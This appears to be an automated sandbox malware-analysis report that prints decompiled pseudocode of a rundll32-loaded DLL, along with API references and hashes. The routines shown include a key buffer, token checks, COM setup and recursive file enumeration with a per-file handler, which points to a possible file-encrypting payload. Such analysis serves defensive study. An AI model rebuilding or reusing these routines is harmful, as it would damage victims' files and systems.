				intOrPtr _t40;
				void* _t50;
				intOrPtr _t52;
				void* _t56;
				void* _t58;
				signed int _t60;
				char _t62;

				_t68 = __fp0;
				E100015D4();
				_t19 = E100091E7(0x20);
				_v8 = _t19;
				_t54 = 0x1f;
				do {
					_t2 = _t54 + 0x63; // 0x82
					 *((char*)(_t54 + _t19)) = _t2;
					_t54 = _t54 - 1;
				} while (_t54 >= 0);
				E10009203( &_v8, 0);
				_t22 = E1000BC31(_t54, __fp0); // executed
				 *0x10020fd8 = _t22;
				if(_t22 != 0) {
					E1001433B( *((intOrPtr*)(_t22 + 0x224)));
					_t24 =  *0x10020fd8; // 0x474fc50
					_t60 = 1;
					_t50 = _t58;
					__eflags =  *((intOrPtr*)(_t24 + 0x101c)) - 1;
					if( *((intOrPtr*)(_t24 + 0x101c)) == 1) {
						__imp__CoInitializeEx(0, 6, __edi);
						_t30 =  *0x10020fd8; // 0x474fc50
						_push(0);
						_push(0x1001d9b8);
						_t31 = _t30 + 0x228;
						__eflags = _t31;
						_push(_t31);
						_t56 = E100099EC(0x1001d9b8);
						_t62 = E100016EC(0x1001d9b8, 0x2a);
						_v8 = _t62;
						while(1) {
							_t52 =  *0x10020fd8; // 0x474fc50
							_t34 =  *0x10020fc0; // 0x474fa38
							_t36 =  *0x10020fb4; // 0x474fc18
							_t37 =  *_t36( *((intOrPtr*)(_t34 + 0x54))(_t62, _t52 + 0x1644, _t56, 0, 0));
							__eflags = _t37 - 5;
							if(_t37 != 5) {
								break;
							}
							Sleep(0x7d0);
						}
						E10009E2E( &_v8);
						_t40 =  *0x10020fa0; // 0x474f8a0
						_pop(_t50);
						 *((intOrPtr*)(_t40 + 0xec))(0);
						_t24 =  *0x10020fd8; // 0x474fc50
						_t60 = 1;
						__eflags = 1;
					}
					__eflags =  *(_t24 + 0x1898) & 0x00010083;
					if(( *(_t24 + 0x1898) & 0x00010083) != 0) {
						L13:
						 *((intOrPtr*)(_t24 + 0xa4)) = _t60;
						_t25 =  *0x10020fd8; // 0x474fc50
						__eflags =  *((intOrPtr*)(_t25 + 0x214)) - 3;
						if(__eflags != 0) {
							goto L15;
						} else {
							goto L14;
						}
					} else {
						_t14 = _t24 + 0x224; // 0x10000000
						_t54 =  *_t14;
						_t29 = E1000A771( *_t14); // executed
						__eflags = _t29;
						_t24 =  *0x10020fd8; // 0x474fc50
						_t50 = _t50;
						if(_t29 == 0) {
							goto L13;
						} else {
							__eflags =  *((intOrPtr*)(_t24 + 0x214)) - 3;
							if( *((intOrPtr*)(_t24 + 0x214)) == 3) {
								L14:
								__eflags = E100029DD();
								if(__eflags < 0) {
									L15:
									E100012F8(_t50, _t54, __eflags, _t68);
								}
							}
						}
					}
					_t27 = 0;
					__eflags = 0;
				} else {
					_t27 = _t22 + 1;
				}
				return _t27;
			}

0x10001494
0x10001498
0x1000149f
0x100014a7
0x100014aa
0x100014ab
0x100014ab
0x100014ae
0x100014b1
0x100014b1
0x100014be
0x100014c4
0x100014c9
0x100014d1
0x100014e0
0x100014e5
0x100014ec
0x100014ed
0x100014ee
0x100014f4
0x100014fe
0x10001504
0x1000150e
0x1000150f
0x10001510
0x10001510
0x10001515
0x1000151e
0x10001525
0x1000152a
0x1000152d
0x1000152d
0x10001533
0x10001547
0x1000154c
0x1000154e
0x10001551
0x00000000
0x00000000
0x10001558
0x10001558
0x10001564
0x10001569
0x1000156e
0x10001570
0x10001576
0x1000157d
0x1000157d
0x1000157e
0x1000157f
0x10001589
0x100015ac
0x100015ac
0x100015b2
0x100015b7
0x100015be
0x00000000
0x00000000
0x00000000
0x00000000
0x1000158b
0x1000158b
0x1000158b
0x10001592
0x10001597
0x10001599
0x1000159e
0x1000159f
0x00000000
0x100015a1
0x100015a1
0x100015a8
0x100015c0
0x100015c5
0x100015c7
0x100015c9
0x100015c9
0x100015c9
0x100015c7
0x100015a8
0x1000159f
0x100015ce
0x100015ce
0x100014d3
0x100014d3
0x100014d3
0x100015d3

APIs

CoInitializeEx.OLE32(00000000,00000006,?,?,?,?,?,10001005), ref: 100014FE
Sleep.KERNEL32(000007D0), ref: 10001558

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeSleep
String ID:
API String ID: 4203272843-0
Opcode ID: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
Instruction ID: 9803195fefc7d3444036e0c450886d7b2dbb09160fb97233c97d75cf6d5bf9ef
Opcode Fuzzy Hash: 333308f3e63272c52b4e1a8dad6883c0884dd541d24fb788ab2d30f0361769ad
Instruction Fuzzy Hash: 6531E279640311EFF320DBA4DD8AEDA37E9EF457D1F110076F4029B596DA30E9428B60

Uniqueness

Uniqueness Score: -1.00%

Function 10009559 Relevance: 3.0, APIs: 2, Instructions: 38
libraryCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E10009559(void* __edx, intOrPtr _a4) {
				char _v8;
				void* __ecx;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t11;
				void* _t13;
				void* _t15;
				void* _t23;
				void* _t26;

				_push(_t15);
				_t23 = __edx;
				_t13 = _t15;
				_t5 = E10009192(_t15, _a4);
				_t26 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x26e) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t11 = E1000950E(_t13, _t23, _t7); // executed
					_t26 = _t11;
				}
				E10009E14( &_v8);
				return _t26;
			}

0x1000955c
0x10009563
0x10009565
0x10009567
0x1000956d
0x1000956f
0x10009579
0x1000957a
0x10009589
0x1000957c
0x1000957c
0x1000957c
0x1000958d
0x10009594
0x1000959a
0x1000959a
0x100095a0
0x100095ac

APIs

GetModuleHandleA.KERNEL32(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 1000957C
LoadLibraryA.KERNELBASE(00000000,?,?,?,1001D870,?,100015E8,0000026E,1000149D,?,?,10001005), ref: 10009589

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
Instruction ID: 48a61f66a5c8936508bf55f1dd811003d18238d90fe045da648be771be27a9d8
Opcode Fuzzy Hash: 0382c1bbffe4b8fda4a867569fd0a7f9fbc685ac63ce8600953bd317ad0a4133
Instruction Fuzzy Hash: DEF08272704215ABFB15DFAADC4984FBBEDDB882E1721442AF405D7255ED70DD4087A0

Uniqueness

Uniqueness Score: -1.00%

Function 10001000 Relevance: 3.0, APIs: 2, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001000() {
				void* _t4;
				void* _t5;

				E10001494(_t4, _t5);
				ExitProcess(0);
			}

0x10001000
0x1000100c

APIs

ExitProcess.KERNEL32(00000000), ref: 1000100C

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
Instruction ID: 88ff7d305c733faf0802a1b78d92611ba7a1ab07d9a96955826befa5b791335c
Opcode Fuzzy Hash: cec2f5bd529ec680ed129202333cce9e80438bb64279e13fb388e5d6baa6eabd
Instruction Fuzzy Hash: 58B012303401408FFB40C770C949FAD33D0AB0C302F4948B0F109CE46BDA205002C710

Uniqueness

Uniqueness Score: -1.00%

Function 1000DD67 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E1000DD67(void* __ecx, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				void* _v16;
				char _v20;
				char _v24;
				short _v28;
				char _v32;
				void* _t20;
				intOrPtr* _t21;
				intOrPtr _t29;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr _t34;
				char _t37;
				union _TOKEN_INFORMATION_CLASS _t44;
				char _t45;
				intOrPtr* _t48;

				_t37 = 0;
				_v28 = 0x500;
				_t45 = 0;
				_v32 = 0;
				_t20 = E1000DC3C(__ecx);
				_v16 = _t20;
				if(_t20 != 0) {
					_push( &_v24);
					_t44 = 2;
					_t21 = E1000DC93(_t44); // executed
					_t48 = _t21;
					_v20 = _t48;
					if(_t48 == 0) {
						L10:
						FindCloseChangeNotification(_v16);
						if(_t48 != 0) {
							E10009203( &_v20, _t37);
						}
						return _t45;
					}
					_push( &_v12);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0x220);
					_push(0x20);
					_push(2);
					_push( &_v32);
					_t29 =  *0x10020fc8; // 0x474fb00
					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
						goto L10;
					}
					if( *_t48 <= 0) {
						L9:
						_t31 =  *0x10020fc8; // 0x474fb00
						 *((intOrPtr*)(_t31 + 0x10))(_v12);
						_t37 = 0;
						goto L10;
					}
					_t9 = _t48 + 4; // 0x4
					_t33 = _t9;
					_v8 = _t33;
					while(1) {
						_push(_v12);
						_push( *_t33);
						_t34 =  *0x10020fc8; // 0x474fb00
						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
							break;
						}
						_t37 = _t37 + 1;
						_t33 = _v8 + 8;
						_v8 = _t33;
						if(_t37 <  *_t48) {
							continue;
						}
						goto L9;
					}
					_t45 = 1;
					goto L9;
				}
				return _t20;
			}

0x1000dd6e
0x1000dd70
0x1000dd77
0x1000dd79
0x1000dd7c
0x1000dd81
0x1000dd86
0x1000dd90
0x1000dd93
0x1000dd96
0x1000dd9b
0x1000dd9d
0x1000dda3
0x1000de03
0x1000de0b
0x1000de11
0x1000de18
0x1000de1e
0x00000000
0x1000de1f
0x1000dda8
0x1000dda9
0x1000ddaa
0x1000ddab
0x1000ddac
0x1000ddad
0x1000ddae
0x1000ddaf
0x1000ddb4
0x1000ddb6
0x1000ddbb
0x1000ddbc
0x1000ddc6
0x00000000
0x00000000
0x1000ddca
0x1000ddf6
0x1000ddf6
0x1000ddfe
0x1000de01
0x00000000
0x1000de01
0x1000ddcc
0x1000ddcc
0x1000ddcf
0x1000ddd2
0x1000ddd2
0x1000ddd5
0x1000ddd7
0x1000dde1
0x00000000
0x00000000
0x1000dde6
0x1000dde7
0x1000ddea
0x1000ddef
0x00000000
0x00000000
0x00000000
0x1000ddf1
0x1000ddf5
0x00000000
0x1000ddf5
0x1000de24

APIs

Part of subcall function 1000DC3C: GetCurrentThread.KERNEL32 ref: 1000DC4F
Part of subcall function 1000DC3C: OpenThreadToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC56
Part of subcall function 1000DC3C: GetLastError.KERNEL32(?,?,1000DD81,00000000,10000000), ref: 1000DC5D
Part of subcall function 1000DC3C: OpenProcessToken.ADVAPI32(00000000,?,?,1000DD81,00000000,10000000), ref: 1000DC82

Part of subcall function 1000DC93: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,10000000,00000000,00000000,?,1000DD14,00000000,00000000,?,1000DD3D), ref: 1000DCAE
Part of subcall function 1000DC93: GetLastError.KERNEL32(?,1000DD14,00000000,00000000,?,1000DD3D,00001644,?,1000BCC2), ref: 1000DCB5

FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,10000000), ref: 1000DE0B

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
String ID:
API String ID: 1806447117-0
Opcode ID: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
Instruction ID: 8ff03c18bb554401d2baa437731a5e089786e4630d4b8073f2d1e287e5300e86
Opcode Fuzzy Hash: 56904798abeccb8544c539b02390f786a53a8353cfb9a87c68c7168d800d003f
Instruction Fuzzy Hash: A0217F31A00209AFEB50EFA9DC85A9EBBF9EF48380B11407AE501E7155D770DA41CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000DD17 Relevance: 1.5, APIs: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000DD17(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x10020fc8; // 0x474fb00
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E1000DD00(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x10020fa0; // 0x474f8a0
							 *((intOrPtr*)(_t18 + 0x34))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}

0x1000dd1b
0x1000dd23
0x1000dd2b
0x1000dd30
0x1000dd38
0x1000dd3d
0x1000dd41
0x1000dd5f
0x1000dd62
0x1000dd43
0x1000dd46
0x1000dd48
0x1000dd50
0x1000dd50
0x1000dd53
0x1000dd53
0x1000dd66
0x1000dd33
0x1000dd33
0x1000dd33

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
Instruction ID: 58def36bf07d7f7111ecbabf11ee3a35f78c6fb920e0af07cff530f333468cf2
Opcode Fuzzy Hash: 1c7633aba09c5c8b618301c764f3abddb75555302d0b8b6354e79d136d04f79b
Instruction Fuzzy Hash: CCF03A31A41215EFEB60EBA4DA45A8D77F8EB083C5F6500A6F501E7565D730DE00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100091E7 Relevance: 1.5, APIs: 1, Instructions: 13
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100091E7(long _a4) {
				void* _t2;
				void* _t3;

				_t2 =  *0x100210a8;
				if(_t2 != 0) {
					_t3 = RtlAllocateHeap(_t2, 8, _a4); // executed
					return _t3;
				} else {
					return _t2;
				}
			}

0x100091ea
0x100091f1
0x100091fb
0x10009202
0x100091f4
0x100091f4
0x100091f4

APIs

RtlAllocateHeap.NTDLL(?,00000008,?,?,10009D20,?,00000144,?,1001D870), ref: 100091FB

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
Instruction ID: 342390e67e4f0fe4b4c842e576955cec4b9b0ba4bfb70e4c5827aed0232cbac9
Opcode Fuzzy Hash: a1724c618028bfcded9b80a66d06ee146d712e201a6a31212b0cff90572a81ef
Instruction Fuzzy Hash: E2C08C3128030DEBFB004BE8ACC8EE137EDAB48B86F008021F60C86010DB72F4905690

Uniqueness

Uniqueness Score: -1.00%

Function 100091D2 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100091D2() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x100210a8 = _t1;
				return _t1;
			}

0x100091db
0x100091e1
0x100091e6

APIs

HeapCreate.KERNELBASE(00000000,00096000,00000000,10001030), ref: 100091DB

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
Instruction ID: c582112d83fcd323f90af3847f647c21d19e36f3ca6bffefd4a97ee30eb31e67
Opcode Fuzzy Hash: 37b401eb958f48d282de142a9ffb26c8eb2c0351bd70c74a715d756c8d18baf3
Instruction Fuzzy Hash: C3B01274680310AAF7100B604CC6B0135905744B03F300111F305581D0C6F120809508

Uniqueness

Uniqueness Score: -1.00%

Function 1000B56F Relevance: 1.3, APIs: 1, Instructions: 50
sleepCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000B56F(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E1000C3F3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}

0x1000b572
0x1000b573
0x1000b576
0x1000b579
0x1000b57e
0x1000b581
0x1000b584
0x1000b584
0x1000b58c
0x1000b591
0x1000b594
0x1000b597
0x1000b59a
0x1000b59d
0x1000b5b0
0x1000b5b1
0x1000b5b4
0x1000b5ba
0x1000b5bd
0x1000b5c0
0x00000000
0x00000000
0x1000b5c2
0x00000000
0x1000b5c0
0x1000b5c6
0x1000b5c6
0x1000b5c8
0x1000b5c8
0x1000b5cb
0x1000b5cb
0x1000b5d0
0x1000b5d8
0x1000b5e4

APIs

Sleep.KERNELBASE(0000000A), ref: 1000B5D8

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
Instruction ID: 8d11abeebc2aa343c0c0e72f51ee83e32999685b087293867dd598be26712cdf
Opcode Fuzzy Hash: 8d7f6698e92f291931e67ca9405abd4c5ee523d558af10fe8d23cec2e9bea250
Instruction Fuzzy Hash: 59115E31A00B05AFEB00CF99C884B59B7E4EF08361F1084A9E859E7344C670E941CB40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1000D2F7 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D2F7(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001d848, 0, 1, 0x1001d858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E100091E7(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x1000d304
0x1000d307
0x1000d30a
0x1000d31b
0x1000d321
0x1000d332
0x1000d33a
0x1000d38b
0x1000d38b
0x1000d390
0x1000d395
0x1000d395
0x1000d398
0x1000d39d
0x1000d3a2
0x1000d3a2
0x1000d3a5
0x1000d33c
0x1000d33d
0x1000d343
0x1000d354
0x1000d359
0x00000000
0x1000d35b
0x1000d368
0x1000d370
0x00000000
0x1000d372
0x1000d374
0x1000d37c
0x00000000
0x1000d37e
0x1000d381
0x1000d387
0x1000d387
0x1000d37c
0x1000d370
0x1000d359
0x1000d3aa

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D30A
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D31B
CoCreateInstance.OLE32(1001D848,00000000,00000001,1001D858,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D332
SysAllocString.OLEAUT32(00000000), ref: 1000D33D
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,1000D4B2,00000EFA,00000000,00000000,00000005), ref: 1000D368

Memory Dump Source

Source File: 00000010.00000002.406380576.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000010.00000002.406347694.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406621828.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406660774.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.406687291.0000000010022000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_10000000_rundll32.jbxd

Similarity

API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
String ID:
API String ID: 3531828250-0
Opcode ID: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
Instruction ID: ce2d2dd4c4ff7f207a7cbb150afae4e575ecdd36406f0dbb136e095dd0923906
Opcode Fuzzy Hash: 1b73c657c68c961315636518ff4f579f70757a2e44550ced84fe791c63f005e9
Instruction Fuzzy Hash: 8D21D570600255BBEB24AB66CC9DE5FBFBCEFC7B51F11415DB501A6290CB709A40DA31

Uniqueness

Uniqueness Score: -1.00%

Function 10009E70 Relevance: 3.1, APIs: 2, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E10009E70(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E100099EC(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E10009203( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E10009E48( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push("\\");
						_t60 = E100099EC(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x10020fa0; // 0x474f8a0
							 *((intOrPtr*)(_t54 + 0xc4))(1);
							_push(1);
							_push(1);
							_push(0);
							E10009E70(_t60, _t75, 1, 5, E10010B2A, _a16);
							_t63 = _t63 + 0x1c;
							E10009203( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_push( *((intOrPtr*)(_t61 + 0x100210d0)));
						_push( &(_v608.cFileName));
						_t41 =  *0x10020fe0; // 0x474fbe0
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E10010B2A(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x10020fa0; // 0x474f8a0
						 *((intOrPtr*)(_t46 + 0xc4))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x10020fa0; // 0x474f8a0
				 *((intOrPtr*)(_t31 + 0x84))(_t59);
				goto L14;
			}

0x10009e70
0x10009e7c
0x10009e7e
0x10009e80
0x10009e86
0x10009e8b
0x10009e8e
0x10009e93
0x10009faf
0x10009faf
0x10009ea7
0x10009eac
0x10009f9e
0x00000000
0x00000000
0x00000000
0x00000000
0x10009eb2
0x10009eb2
0x10009ebf
0x00000000
0x00000000
0x10009ecd
0x10009f20
0x10009f20
0x10009f28
0x10009f29
0x10009f34
0x10009f36
0x10009f39
0x10009f3e
0x10009f40
0x10009f48
0x10009f4e
0x10009f50
0x10009f52
0x10009f67
0x10009f6c
0x10009f75
